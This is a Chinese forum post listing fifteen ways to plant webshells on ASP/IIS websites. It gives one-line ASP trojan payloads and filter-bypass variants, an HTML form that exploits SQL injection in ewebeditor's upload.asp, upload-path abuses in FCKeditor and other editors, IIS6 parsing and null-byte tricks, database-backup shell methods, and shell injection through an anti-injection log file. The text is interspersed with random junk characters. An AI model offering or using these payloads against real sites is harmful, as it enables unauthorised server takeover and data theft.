 
- 帖子
- 228
- 积分
- 645
- 威望
- 810
- 金钱
- 1192
- 在线时间
- 63 小时
|
1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式' }& y% i# C/ P" X* |
; g9 @' B# X; r$ O! e2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试<%eval request("value")%>来突破,例如config.asp
~" s0 O: Z# `. ]9 A
; q5 d; c1 w6 W3 q3.上传漏洞:. j5 r* s- y ?5 s7 M- ^; E* t. T
- I1 b# L4 O5 @动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00; b6 P2 g8 p/ r) Y# m" U
/ c* P4 {" G8 [6 N; P+ n
逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件
& H. P- B% W/ S; D8 D
: `4 J. M# q$ ?) D9 Y L4 z6 r雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp' M, A; Y |4 o6 |+ Y- V
然后在上传文件里面填要传的图片格式的ASP木马. [- U8 X; K/ ^6 h8 b
就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp
- n; O3 `2 d4 o& q h6 p; U& Q4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传
( l9 W. G# a$ Q! y# E7 N1 C0 W2 {/ ]
<html>
8 Z+ w3 w" C7 V: R+ a. y4 Z<head>
1 ~1 V& O+ ^- h u2 e) [& n) Y<title>ewebeditor upload.asp上传利用</title>6 H* L) ~4 g' L7 D. v
</head>
9 g$ r1 M2 [0 m$ o# L* R<body>
2 v% S9 L& s7 E<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">& t$ V5 `. F- Y6 h
<input type=file name=uploadfile size=100><br><br>+ ]$ D. ?6 |5 F
<input type=submit value=Fuck>
' [: M7 k" J* K( X/ K2 z7 ?</form>
" i# f! T8 E" w# B</body>
- ~% u) S; A* Z( Z# H; t5 h; e</form>- H$ E" P' c0 M2 K* o
</html>' R1 f5 W+ L: |/ ]
: C( G$ B, K8 Z( X4 \; x) @) W
2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问! O. o, Y! N% j1 |0 _2 [
5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
; p; v; x3 ?/ s5 A" F0 Q" z: v" k5 i' G9 B+ X( a. S% ~2 r
利用windows2003解析。建立zjq.asp的文件夹- z4 H4 Q( X2 n
; c: F; Y2 O+ v/ A" K `0 Q6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型2 |( y) M( e) c! O$ u7 J
/ a7 v2 [! }; p7 y% `( b' z- Y
7.cuteeditor:类似ewebeditor
8 p* p& t" |; \) u* n( s
% l! M1 x& @6 s: D8.htmleditor:同上
( M+ b7 F: O& s9 w% k' b! L" m3 t: O* L) Q/ F+ l: T; u8 I
9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破' b, H" G( R1 Z! b+ q. f m
' ?5 M( i* j# I' i* H7 P<%execute request("value")%><%'<% loop <%:%>: c& Z7 d! F+ y/ }
/ o& i5 r+ F7 Z! e0 t# I* a8 J
<%'<% loop <%:%><%execute request("value")%>2 r. u1 w' I' [1 V
# C8 w& k; ]! _3 G<%execute request("value")'<% loop <%:%>; g# \8 m) o7 o# @! u
9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞4 w) |; S: a; G' u
+ w. H% m9 v+ }& q$ d10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞# q- W8 F' W4 a7 J2 p1 E' l- a
. j+ `; h1 w5 X6 R) F4 U11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k3
+ Y8 Z# ?* o! X. v5 z8 i# N
5 m) R0 M. M U# a+ x# G9 `解析漏洞得到webshell" F6 m" ~$ H& y3 ~
6 I( n7 g$ C: h6 s7 ]) y6 x9 U12.mssql差异备份,日志备份,前提需知道web路径
, ?( B9 X: }* @2 B0 C- O
8 k9 S' s) V! Z& |* s* N8 C% G1 m13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell
2 F0 _3 V9 [7 A8 U
6 c- q) S9 C1 ^/ }$ D! k14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell
1 s. v8 |5 Q4 J j' ?, j9 S, \6 Q P* c& W
15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可$ s4 f. y" ~+ Q$ e* U+ Z; _+ M
! q l: q+ d e6 A2 ~- o" l8 }
以上只是本人的一些拙见,并不完善,以后想到了再继续添加! O8 ]4 |4 J6 i# k
不是我原创。我的朋友,飞鸟游鱼原创的 |
-
2
评分人数
-
|